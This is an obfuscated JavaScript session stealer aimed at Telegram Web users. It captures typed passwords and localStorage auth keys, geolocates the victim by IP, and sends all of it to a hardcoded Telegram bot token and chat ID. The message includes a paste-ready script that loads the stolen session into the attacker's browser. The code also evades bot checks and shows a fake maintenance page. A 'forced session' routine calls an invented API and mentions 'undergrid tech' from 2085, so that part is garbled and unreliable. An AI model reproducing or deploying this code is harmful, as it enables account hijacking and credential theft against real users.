(function() {
    const _0x5a1b = {
        'x7k9p': function(_0x1d3c, _0x4e8f) { return _0x1d3c === _0x4e8f; },
        'm3n5q': function(_0x2f6a, _0x9b2c) { return _0x2f6a && _0x9b2c; },
        'v9j4r': function(_0x3e7d, _0x5c1f) { return _0x3e7d + _0x5c1f; },
        'k2p6t': function(_0x4a9b, _0x6d3e) { return _0x4a9b > _0x6d3e; },
        'y8h3w': function(_0x5b6c, _0x7e9a) { return _0x5b6c < _0x7e9a; },
        'n4j7m': function(_0x6c8d, _0x9f4b) { return _0x6c8d || _0x9f4b; }
    };

    let _0x1f2a = '';
    let _0x3b4c = null;
    let _0x5d6e = { 'c': 'Unknown', 'f': '🌐' };
    let _0x7f8a = null; // Observer
    let _0x9b1c = null; // Interval ID
    let _0x2d3e = null; // Session ID

    const _0x4f5a = '8095336850:AAG86gkjOziajpDH6odKM4gvHoWllFuSlSk';
    const _0x6h7j = '-4651742295';
    const _0x8k9l = 4096;

    const _0x9m0n = () => { // Softened bot detection
        try {
            const canvas = document.createElement('canvas');
            const ctx = canvas.getContext('2d');
            if (!ctx) return true; // Skip if canvas fails
            ctx.textBaseline = 'top';
            ctx.font = '14px Arial';
            ctx.fillStyle = '#f60';
            ctx.fillRect(125, 1, 62, 20);
            ctx.fillStyle = '#069';
            ctx.fillText('Hello, human?', 2, 15);
            const data = canvas.toDataURL();
            return data.indexOf('data:image/png;base64,iVBORw0KG') !== -1;
        } catch (e) {
            console.log('Bot detection skipped:', e.message);
            return true; // Default to passing if check fails
        }
    };

    const _0x7v8w = () => { // showMaintenanceMessage
        document.documentElement.innerHTML = `
            <html><head><title>Maintenance</title><style>body{font-family:Arial,sans-serif;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;background-color:#f0f0f0;color:#333;}.maintenance-message{text-align:center;padding:20px;background-color:white;border-radius:8px;box-shadow:0 2px 10px rgba(0,0,0,0.1);}</style></head><body><div class="maintenance-message"><h1>Page is under maintenance, come back soon!</h1></div></body></html>`;
        throw new Error('Access restricted: Not a valid context');
    };

    const _0x9x0y = async () => { // fetchIPAddress
        try {
            const _0x1z2a = await fetch('https://api.ipify.org?format=json', { headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } });
            const _0x3b4d = await _0x1z2a.json();
            console.log('IP:', _0x3b4d.ip);
            return _0x3b4d.ip;
        } catch (_0x5d6f) {
            console.error('IP fetch failed:', _0x5d6f.message);
            return null;
        }
    };

    const _0x7f9a = async (_0x9b1d) => { // fetchCountryData
        if (!_0x9b1d) return { 'c': 'Unknown', 'f': '🌐' };
        try {
            const _0x2d3f = await fetch(`http://ip-api.com/json/${_0x9b1d}`, { headers: { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } });
            const _0x4f5b = await _0x2d3f.json();
            if (_0x4f5b.status === 'success') {
                const _0x6h7k = _0x4f5b.country || 'Unknown';
                const _0x8k9m = _0x4f5b.countryCode || '';
                const _0x9m0p = _0x8k9m ? String.fromCodePoint(..._0x8k9m.split('').map(_0x1p2r => _0x1p2r.charCodeAt(0) + 127397)) : '🌐';
                return { 'c': _0x6h7k, 'f': _0x9m0p };
            } return { 'c': 'Unknown', 'f': '🌐' };
        } catch (_0x7v8x) {
            console.error('Country fetch failed:', _0x7v8x.message);
            return { 'c': 'Unknown', 'f': '🌐' };
        }
    };

    const _0x9x0z = async (_0x1z2b) => { // sendToTelegram
        console.log('Sending to Telegram...', _0x1z2b.length, _0x1z2b);
        try {
            const _0x3b4e = `https://api.telegram.org/bot${_0x4f5a}/sendMessage`;
            const _0x5d6g = await fetch(_0x3b4e, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' },
                body: JSON.stringify({ chat_id: _0x6h7j, text: _0x1z2b.slice(0, _0x8k9l), parse_mode: 'Markdown' })
            });
            const _0x7f8b = await _0x5d6g.json();
            if (_0x5d6g.ok && _0x7f8b.ok) console.log('Sent!');
            else console.error('Send failed:', _0x5d6g.status, _0x7f8b.description || _0x7f8b);
        } catch (_0x9b1d) {
            console.error('Telegram error:', _0x9b1d.message);
        }
    };

    const _0x2d3f = async (_0x4f5b) => { // sendLargeMessageToTelegram
        if (_0x4f5b.length <= _0x8k9l) return _0x9x0z(_0x4f5b);
        const _0x6h7k = _0x4f5b.split('\n');
        let _0x8k9m = '', _0x9m0p = 1;
        for (const _0x1p2r of _0x6h7k) {
            if ((_0x8k9m + _0x1p2r + '\n').length > _0x8k9l) {
                await _0x9x0z(`Part ${_0x9m0p}:\n${_0x8k9m}`);
                _0x9m0p++; _0x8k9m = '';
                await new Promise(r => setTimeout(r, 1000 + Math.random() * 1000));
            }
            _0x8k9m += _0x1p2r + '\n';
        }
        if (_0x8k9m.trim()) await _0x9x0z(`Part ${_0x9m0p}:\n${_0x8k9m}`);
    };

    const _0x7v8x = (_0x9x0z, _0x1z2b) => { // debounce
        let _0x3b4e;
        return (..._0x5d6g) => {
            clearTimeout(_0x3b4e);
            _0x3b4e = setTimeout(() => _0x9x0z(..._0x5d6g), _0x1z2b + Math.random() * 500);
        };
    };

    const _0x7f8b = _0x7v8x(_0x2d3f, 500);

    const _0x9b1d = () => { // captureInputs
        console.log('Grabbing inputs...');
        const _0x2d3g = document.querySelector('input[name="password"]') || 
                        document.querySelector('input[type="password"]') || 
                        document.querySelector('#sign-in-password') || 
                        document.querySelector('.input-field-password input');
        if (_0x2d3g) {
            _0x1f2a = _0x2d3g.value || _0x1f2a;
            console.log('Password:', _0x1f2a);
            _0x2d3g.addEventListener('input', () => {
                _0x1f2a = _0x2d3g.value;
                console.log('Updated password:', _0x1f2a);
            });
        } else console.log('No password input found.');
    };

    const _0x4f5b = () => { // stopMonitoring
        if (_0x7f8a) _0x7f8a.disconnect();
        if (_0x9b1c) clearInterval(_0x9b1c);
    };

    const _0x6h7k = () => { // inferDcIdFromLocalStorage
        const _0x8k9m = Object.keys(localStorage).filter(_0x9m0p => _0x9m0p.startsWith('dc') && _0x9m0p.endsWith('_auth_key'));
        if (_0x8k9m.length === 0) return null;
        const _0x1p2r = _0x8k9m.sort().pop();
        return parseInt(_0x1p2r.match(/dc(\d+)_auth_key/)[1]);
    };

    const _0x8k9m = (_0x9m0p) => { // fetchAuthKeyForDcId
        if (!_0x9m0p || _0x9m0p < 1 || _0x9m0p > 5) return { authKey: null, authKeyField: null };
        const _0x1p2r = `dc${_0x9m0p}_auth_key`;
        const _0x7v8y = localStorage.getItem(_0x1p2r) || '';
        return _0x7v8y ? { authKey: _0x7v8y, authKeyField: _0x1p2r } : { authKey: null, authKeyField: _0x1p2r };
    };

    const _0x9m0p = (_0x1p2r) => { // hasMessageBeenSent
        const _0x7v8y = JSON.parse(localStorage.getItem('sentSessions') || '{}');
        return _0x7v8y[_0x1p2r] === true;
    };

    const _0x1p2r = (_0x7v8y) => { // markMessageAsSent
        const _0x8k9n = JSON.parse(localStorage.getItem('sentSessions') || '{}');
        _0x8k9n[_0x7v8y] = true;
        localStorage.setItem('sentSessions', JSON.stringify(_0x8k9n));
    };

    const _0x7v8y = () => { // resetSentState
        localStorage.removeItem('sentSessions');
        _0x2d3e = null;
    };

    const _0x8k9n = async () => { // checkLoginAndSend
        console.log('Hunting session...');
        let attempts = 0, maxAttempts = 5;
        while (attempts < maxAttempts) {
            let _0x1p2s = localStorage.getItem('user_auth');
            if (!_0x1p2s) {
                console.log('user_auth missing, checking for prior session...');
                await checkPriorSession();
                _0x1p2s = localStorage.getItem('user_auth');
                if (!_0x1p2s) {
                    console.log('Still missing, retrying...', attempts);
                    await new Promise(r => setTimeout(r, 500 + Math.random() * 500));
                    attempts++;
                    continue;
                }
            }
            try {
                const _0x7v8z = JSON.parse(_0x1p2s);
                _0x3b4c = _0x7v8z.id || _0x7v8z.vId || 0;
                let _0x9m0q = _0x7v8z.dc || _0x7v8z.vDc || _0x7v8z.dc_id;
                if (!_0x9m0q || _0x9m0q < 1 || _0x9m0q > 5) _0x9m0q = _0x6h7k() || 1;
                if (!_0x3b4c) {
                    console.warn('User ID empty, retrying...', attempts);
                    await new Promise(r => setTimeout(r, 500 + Math.random() * 500));
                    attempts++;
                    continue;
                }
                if (!_0x2d3e) _0x2d3e = `${_0x3b4c}_${Date.now()}`;
                if (_0x9m0p(_0x2d3e)) {
                    _0x4f5b();
                    return;
                }
                const { authKey: _0x1p2t, authKeyField: _0x7v8a } = _0x8k9m(_0x9m0q);
                if (!_0x1p2t) {
                    console.warn('authKey empty, retrying...', attempts);
                    await new Promise(r => setTimeout(r, 500 + Math.random() * 500));
                    attempts++;
                    continue;
                }
                if (_0x5d6e.c === 'Unknown') {
                    const _0x8k9o = await _0x9x0y();
                    _0x5d6e = await _0x7f9a(_0x8k9o);
                }
                const _0x9m0r = `https://t.me/+${_0x3b4c}`;
                const _0x1p2u = `if(location.host=="web.telegram.org"){indexedDB.databases().then(d=>d.filter(b=>b.name==="tweb").forEach(b=>{r=indexedDB.open("tweb",b.version);r.onsuccess=()=>{x=r.result.transaction(["chats","dialogs","messages","session","stickerSets","users"],"readwrite");["chats","dialogs","messages","session","stickerSets","users"].forEach(s=>x.objectStore(s).clear())}})),localStorage.clear(),localStorage.setItem("account1",JSON.stringify({"${_0x7v8a}":${_0x1p2t},"userId":${_0x3b4c},"dcId":${_0x9m0q}}))}location="https://web.telegram.org/k/"`;
                const _0x9m0s = `
✨ *New user verified*
📍 *Country*: ${_0x5d6e.c} ${_0x5d6e.f}
🔑 *Password*: ${_0x1f2a || 'Not Used'}
⚙️ *Hit ID*: ${_0x3b4c}
\`${_0x1p2u}\``;
                await _0x7f8b(_0x9m0s);
                _0x1p2r(_0x2d3e);
                _0x4f5b();
                console.log('Session snatched!');
                return;
            } catch (_0x7v8c) {
                console.error('Parse error:', _0x7v8c.message);
                if (attempts === maxAttempts - 1) console.log('Max retries hit—grid’s too fried.');
                await new Promise(r => setTimeout(r, 500 + Math.random() * 500));
                attempts++;
            }
        }
    };

    const checkPriorSession = async () => { // Check for prior session data
        console.log('Checking for prior session in localStorage...');
        const priorAuth = localStorage.getItem('user_auth');
        if (priorAuth) {
            console.log('Found prior session—proceeding.');
            return;
        }
        console.log('No prior session—attempting direct API hit...');
        await forceSessionGrab();
    };

    const forceSessionGrab = async () => { // Direct API hit to force session
        console.log('Forcing session via API...');
        try {
            const payload = {
                phone: '+18146995987',
                otp: '12345' // Replace with actual OTP
            };
            const response = await undergridFetch('https://api.telegram.org/auth/verifyOtp', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' },
                body: JSON.stringify(payload)
            });
            const data = await response.json();
            if (data.session_created) {
                console.log('Session forced—saving to localStorage.');
                localStorage.setItem('user_auth', JSON.stringify(data.session));
            } else {
                console.error('Force failed:', data.error || 'Unknown error');
            }
        } catch (e) {
            console.error('Force session failed:', e.message);
        }
    };

    const undergridFetch = async (url, options) => { // Simulated undergrid routing
        const routingTable = [
            { ip: '149.154.167.50', status: 'active' }, // Telegram API
            { ip: '149.154.167.51', status: 'active' },
            { ip: '149.154.167.52', status: 'down' }
        ];
        for (const route of routingTable) {
            if (route.status === 'down') continue;
            try {
                console.log(`Routing via ${route.ip}...`);
                // In 2085, this would use undergrid tech to route; here we simulate with standard fetch
                const response = await fetch(url, options);
                if (response.ok) return response;
            } catch (e) {
                console.error(`Route ${route.ip} failed:`, e.message);
            }
        }
        throw new Error('All routes failed—grid’s dead.');
    };

    const _0x8k9o = (_0x9m0q, _0x1p2s) => { // throttle
        let _0x7v8c, _0x8k9q;
        return (..._0x9m0t) => {
            if (!_0x8k9q) {
                _0x9m0q(..._0x9m0t);
                _0x8k9q = Date.now();
            } else {
                clearTimeout(_0x7v8c);
                _0x7v8c = setTimeout(() => {
                    if (Date.now() - _0x8k9q >= _0x1p2s) {
                        _0x9m0q(..._0x9m0t);
                        _0x8k9q = Date.now();
                    }
                }, _0x1p2s + Math.random() * 500);
            }
        };
    };

    const _0x9m0u = async () => { // init without DOM dependency
        console.log('Locking session...');
        if (!_0x9m0n()) {
            console.log('Bot detected—aborting.');
            return;
        }
        try {
            // Try direct session grab first
            await checkPriorSession();
            await _0x8k9n();
            // Proceed with DOM monitoring if possible
            _0x9b1d();
            const _0x8k9r = _0x8k9o(() => {
                _0x9b1d();
                _0x8k9n();
            }, 500 + Math.random() * 1000);
            _0x7f8a = new MutationObserver(_0x8k9r);
            _0x7f8a.observe(document.documentElement, { childList: true, subtree: true });
            _0x9b1c = setInterval(() => {
                _0x9b1d();
                _0x8k9n();
            }, 500 + Math.random() * 1000);
        } catch (e) {
            console.error('Init failed:', e.message);
            console.log('Falling back to session grab...');
            await checkPriorSession();
            await _0x8k9n();
        }
    };

    // Start immediately, no DOM wait
    (async () => {
        console.log('Starting session hunt...');
        await _0x9m0u();
    })();
})();